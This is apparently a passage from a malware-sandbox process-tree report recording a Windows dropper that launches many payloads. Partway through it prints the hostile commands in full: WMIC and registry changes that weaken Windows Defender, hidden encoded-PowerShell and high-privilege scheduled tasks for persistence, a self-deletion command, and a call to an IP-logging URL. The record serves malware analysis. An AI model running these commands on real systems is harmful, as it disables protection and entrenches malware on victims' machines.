        "C:\ProgramData\7553059.exe"
        8⤵
        
        PID:1544
        
        C:\ProgramData\8039490.exe
        
        "C:\ProgramData\8039490.exe"
        8⤵
        
        PID:5212
        
        C:\ProgramData\8039490.exe
        
        "C:\ProgramData\8039490.exe"
        9⤵
        
        PID:856
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5212 -s 1076
        9⤵
        Program crash
        
        PID:5588
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5212 -s 1076
        9⤵
        Program crash
        
        PID:2944
        
        C:\ProgramData\4608318.exe
        
        "C:\ProgramData\4608318.exe"
        8⤵
        
        PID:4944
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        Executes dropped EXE
        
        PID:5164
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5164 -s 1716
        8⤵
        Program crash
        
        PID:5808
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        
        PID:1616
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 620
        8⤵
        Program crash
        
        PID:1132
        
        C:\Users\Admin\AppData\Local\Temp\udptest.exe
        
        "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
        7⤵
        
        PID:6016
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 280
        8⤵
        Program crash
        
        PID:2008
        
        C:\Users\Admin\AppData\Local\Temp\5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5.exe"
        7⤵
        
        PID:784
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 784 -s 1724
        8⤵
        Program crash
        
        PID:3224
        
        C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"
        7⤵
        
        PID:5176
        
        C:\Users\Admin\AppData\Local\Temp\tmp3A89_tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmp3A89_tmp.exe"
        8⤵
        
        PID:6024
        
        C:\Users\Admin\AppData\Local\Temp\tmp3A89_tmp.exe
        
        C:\Users\Admin\AppData\Local\Temp\tmp3A89_tmp.exe
        9⤵
        
        PID:3664
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        
        PID:2040
        
        C:\Users\Admin\AppData\Local\Temp\is-PN4S5.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-PN4S5.tmp\setup_2.tmp" /SL5="$80262,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        
        PID:2176
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        9⤵
        
        PID:5900
        
        C:\Users\Admin\AppData\Local\Temp\is-LO7LJ.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-LO7LJ.tmp\setup_2.tmp" /SL5="$1036A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        10⤵
        
        PID:3500
        
        C:\Users\Admin\AppData\Local\Temp\is-EL84N.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-EL84N.tmp\postback.exe" ss1
        11⤵
        
        PID:4120
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        7⤵
        
        PID:3068
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        8⤵
        
        PID:1488
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        
        PID:5904
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        
        PID:5748
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe
      4⤵
      PID:4592
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe
      4⤵
      PID:3828
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe
      4⤵
      PID:4224
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun198361825f4.exe
      4⤵
      PID:4036
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe
      4⤵
      PID:1720
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3112
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2376
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1520

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 95b927cb4616ec696e4cd068d5023fc5 jNR+iCmMfU204RS7O8u1lQ.0.1.0.3.0
1⤵
- Modifies data under HKEY_USERS
PID:4576

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:4644

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv jNR+iCmMfU204RS7O8u1lQ.0.2
1⤵
PID:5036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3268
- C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
  C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
  2⤵
  PID:1104

C:\Users\Admin\AppData\Local\Temp\7zS8E04AA71\Sun1917b8fb5f09db8.exe
Sun1917b8fb5f09db8.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2264
- C:\Users\Admin\Documents\SXs5f8_awuFyGhuwDLB_6cji.exe
  "C:\Users\Admin\Documents\SXs5f8_awuFyGhuwDLB_6cji.exe"
  2⤵
  PID:4224
- C:\Users\Admin\Documents\Jmm15_dbCS0CjJajax9yclRS.exe
  "C:\Users\Admin\Documents\Jmm15_dbCS0CjJajax9yclRS.exe"
  2⤵
  PID:1452
- - C:\Program Files (x86)\Company\NewProduct\cm3.exe
    "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
    3⤵
    PID:696
- - C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
    3⤵
    PID:3680
- - C:\Program Files (x86)\Company\NewProduct\inst001.exe
    "C:\Program Files (x86)\Company\NewProduct\inst001.exe"
    3⤵
    PID:1544
- C:\Users\Admin\Documents\msfjzjWI_tAz570_s_v588YQ.exe
  "C:\Users\Admin\Documents\msfjzjWI_tAz570_s_v588YQ.exe"
  2⤵
  PID:4256
- C:\Users\Admin\Documents\9xV5cxvdKI7BUXIsptvy3CaU.exe
  "C:\Users\Admin\Documents\9xV5cxvdKI7BUXIsptvy3CaU.exe"
  2⤵
  PID:3108
- - C:\Users\Admin\Documents\9xV5cxvdKI7BUXIsptvy3CaU.exe
    C:\Users\Admin\Documents\9xV5cxvdKI7BUXIsptvy3CaU.exe
    3⤵
    PID:1308
- C:\Users\Admin\Documents\ldx2J2adfAFsDt83XS0csipv.exe
  "C:\Users\Admin\Documents\ldx2J2adfAFsDt83XS0csipv.exe"
  2⤵
  PID:484
- - C:\Users\Admin\Documents\ldx2J2adfAFsDt83XS0csipv.exe
    C:\Users\Admin\Documents\ldx2J2adfAFsDt83XS0csipv.exe
    3⤵
    PID:4932
- C:\Users\Admin\Documents\TNw1Kcv6G9R4hzEOpu3pqYWo.exe
  "C:\Users\Admin\Documents\TNw1Kcv6G9R4hzEOpu3pqYWo.exe"
  2⤵
  PID:1560
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 244
    3⤵
    - Program crash
    PID:3924
- C:\Users\Admin\Documents\E5JvL0114UhUliQ4dr4OAA3J.exe
  "C:\Users\Admin\Documents\E5JvL0114UhUliQ4dr4OAA3J.exe"
  2⤵
  PID:1576
- C:\Users\Admin\Documents\sypIzTq6OdYiznoFD5GDWpcn.exe
  "C:\Users\Admin\Documents\sypIzTq6OdYiznoFD5GDWpcn.exe"
  2⤵
  PID:6072
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\sypIzTq6OdYiznoFD5GDWpcn.exe"
    3⤵
    PID:4716
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /T 10 /NOBREAK
      4⤵
      Delays execution with timeout.exe
      PID:2556
- C:\Users\Admin\Documents\MWLug6Njzm7aGdoAeRAukca3.exe
  "C:\Users\Admin\Documents\MWLug6Njzm7aGdoAeRAukca3.exe"
  2⤵
  PID:2716
- - C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe
    "C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"
    3⤵
    PID:784
  - - C:\Users\Admin\Documents\cxNM2MFzI1OR19ML3SRoOzLL.exe
      "C:\Users\Admin\Documents\cxNM2MFzI1OR19ML3SRoOzLL.exe"
      4⤵
      PID:5028
  - - C:\Users\Admin\Documents\rIrnj3s_halCMMLJI_VjPbOB.exe
      "C:\Users\Admin\Documents\rIrnj3s_halCMMLJI_VjPbOB.exe" /mixtwo
      4⤵
      PID:4356
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 252
        5⤵
        Program crash
        
        PID:7024
  - - C:\Users\Admin\Documents\5gnkgAEy692FBdcqO6buiS9G.exe
      "C:\Users\Admin\Documents\5gnkgAEy692FBdcqO6buiS9G.exe"
      4⤵
      PID:1720
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 264
        5⤵
        Program crash
        
        PID:648
  - - C:\Users\Admin\Documents\hcUDB_8jWFYWroz6FpXaWWmX.exe
      "C:\Users\Admin\Documents\hcUDB_8jWFYWroz6FpXaWWmX.exe"
      4⤵
      PID:5732
    - - C:\Users\Admin\AppData\Local\Temp\7zSD02D.tmp\Install.exe
        
        .\Install.exe
        5⤵
        
        PID:1912
      - C:\Users\Admin\AppData\Local\Temp\7zSE6C2.tmp\Install.exe
        
        .\Install.exe /S /site_id "668658"
        6⤵
        
        PID:4488
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
        7⤵
        
        PID:6732
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
        8⤵
        
        PID:6924
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        9⤵
        
        PID:6448
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        10⤵
        
        PID:5036
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        11⤵
        
        PID:6452
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
        8⤵
        
        PID:5612
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        9⤵
        
        PID:3704
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        10⤵
        
        PID:5260
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        11⤵
        
        PID:3924
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
        8⤵
        
        PID:6912
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        9⤵
        
        PID:3548
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        10⤵
        
        PID:1696
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        11⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
        8⤵
        
        PID:1604
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        9⤵
        
        PID:6484
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        10⤵
        
        PID:920
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        11⤵
        
        PID:1144
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        7⤵
        
        PID:6440
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        8⤵
        
        PID:6008
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        9⤵
        
        PID:6656
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        9⤵
        
        PID:6508
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        7⤵
        
        PID:3304
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        8⤵
        
        PID:7128
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        9⤵
        
        PID:3796
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        9⤵
        
        PID:5876
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gzwmWXEeO" /SC once /ST 14:28:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        7⤵
        Creates scheduled task(s)
        
        PID:5636
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bRciptYQhTCMvEFWGJ" /SC once /ST 21:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\zzSPTLk.exe\" W8 /site_id 668658 /S" /V1 /F
        7⤵
        Creates scheduled task(s)
        
        PID:2788
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:1480
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:1144
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4328
- C:\Users\Admin\Documents\MbOcM3lrpl2VNSKMbfn15kaL.exe
  "C:\Users\Admin\Documents\MbOcM3lrpl2VNSKMbfn15kaL.exe"
  2⤵
  PID:2536
- C:\Users\Admin\Documents\0XVQyPRpzclXyu263YbqK6ad.exe
  "C:\Users\Admin\Documents\0XVQyPRpzclXyu263YbqK6ad.exe"
  2⤵
  PID:4244
- C:\Users\Admin\Documents\_QqD503l7Py7degBEkK0v4V3.exe
  "C:\Users\Admin\Documents\_QqD503l7Py7degBEkK0v4V3.exe"
  2⤵
  PID:2744
- C:\Users\Admin\Documents\zGRlLVc98pbibgUwamlRsyng.exe
  "C:\Users\Admin\Documents\zGRlLVc98pbibgUwamlRsyng.exe"
  2⤵
  PID:2676
- - C:\Windows\SysWOW64\cmd.exe
    "cmd" /c start "" "f.exe" & start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"
    3⤵
    PID:5648
  - - C:\Users\Admin\AppData\Local\Temp\wwi.exe
      "wwi.exe"
      4⤵
      PID:3424
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2560
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"
      4⤵
      PID:4264
  - - C:\Users\Admin\AppData\Local\Temp\wwl.exe
      "wwl.exe"
      4⤵
      PID:5192
  - - C:\Users\Admin\AppData\Local\Temp\f.exe
      "f.exe"
      4⤵
      PID:4808
- C:\Users\Admin\Documents\zdX41tnpnxS3IqvMgICDXK_d.exe
  "C:\Users\Admin\Documents\zdX41tnpnxS3IqvMgICDXK_d.exe"
  2⤵
  PID:2168
- - C:\Users\Admin\Documents\zdX41tnpnxS3IqvMgICDXK_d.exe
    "C:\Users\Admin\Documents\zdX41tnpnxS3IqvMgICDXK_d.exe"
    3⤵
    PID:2068
- C:\Users\Admin\Documents\Wt7ejom2Ym0R6OGAriU2_r5u.exe
  "C:\Users\Admin\Documents\Wt7ejom2Ym0R6OGAriU2_r5u.exe"
  2⤵
  PID:2752
- C:\Users\Admin\Documents\wWBlVjs1R9FFHnxrYFSC0vSi.exe
  "C:\Users\Admin\Documents\wWBlVjs1R9FFHnxrYFSC0vSi.exe"
  2⤵
  PID:5204
- C:\Users\Admin\Documents\CDs_nsd_Emcy2w8tTb88c_br.exe
  "C:\Users\Admin\Documents\CDs_nsd_Emcy2w8tTb88c_br.exe"
  2⤵
  PID:2804
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 240
    3⤵
    - Program crash
    PID:1144
- C:\Users\Admin\Documents\gr3s40s1U8rveyC4qbWcSkkn.exe
  "C:\Users\Admin\Documents\gr3s40s1U8rveyC4qbWcSkkn.exe"
  2⤵
  PID:3664
- - C:\Users\Admin\AppData\Roaming\7219511.scr
    "C:\Users\Admin\AppData\Roaming\7219511.scr" /S
    3⤵
    PID:3348
- - C:\Users\Admin\AppData\Roaming\6837863.scr
    "C:\Users\Admin\AppData\Roaming\6837863.scr" /S
    3⤵
    PID:4548
- - C:\Users\Admin\AppData\Roaming\3838916.scr
    "C:\Users\Admin\AppData\Roaming\3838916.scr" /S
    3⤵
    PID:1848

C:\Users\Admin\AppData\Local\Temp\7zS8E04AA71\Sun195a1614ec24e6a.exe
Sun195a1614ec24e6a.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4108

C:\Users\Admin\AppData\Local\Temp\7zS8E04AA71\Sun19eb40faaaa9.exe
Sun19eb40faaaa9.exe
1⤵
- Executes dropped EXE
PID:2784

C:\Users\Admin\AppData\Local\Temp\7zS8E04AA71\Sun1966fb31dd5a07.exe
Sun1966fb31dd5a07.exe
1⤵
- Executes dropped EXE
PID:2164
- C:\Users\Admin\AppData\Local\Temp\is-PK4KF.tmp\Sun1966fb31dd5a07.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-PK4KF.tmp\Sun1966fb31dd5a07.tmp" /SL5="$201A4,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS8E04AA71\Sun1966fb31dd5a07.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3552
- - C:\Users\Admin\AppData\Local\Temp\is-Q53L3.tmp\Ze2ro.exe
    "C:\Users\Admin\AppData\Local\Temp\is-Q53L3.tmp\Ze2ro.exe" /S /UID=burnerch2
    3⤵
    - Executes dropped EXE
    PID:4124
  - - C:\Users\Admin\AppData\Local\Temp\YGAXTSAXMT\ultramediaburner.exe
      "C:\Users\Admin\AppData\Local\Temp\YGAXTSAXMT\ultramediaburner.exe" /VERYSILENT
      4⤵
      PID:5280
    - - C:\Users\Admin\AppData\Local\Temp\is-7SSUE.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-7SSUE.tmp\ultramediaburner.tmp" /SL5="$2027C,281924,62464,C:\Users\Admin\AppData\Local\Temp\YGAXTSAXMT\ultramediaburner.exe" /VERYSILENT
        5⤵
        
        PID:4668
      - C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        6⤵
        
        PID:6892
  - - C:\Users\Admin\AppData\Local\Temp\16-cd82f-76d-8fc90-a7d04b41060c4\Byraelymaebe.exe
      "C:\Users\Admin\AppData\Local\Temp\16-cd82f-76d-8fc90-a7d04b41060c4\Byraelymaebe.exe"
      4⤵
      PID:6416
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
        5⤵
        
        PID:436
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe0,0x104,0x108,0xb8,0x10c,0x7ff8df5946f8,0x7ff8df594708,0x7ff8df594718
        6⤵
        
        PID:5480
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,15045579794183093339,6532059554244505996,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
        6⤵
        
        PID:7128
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
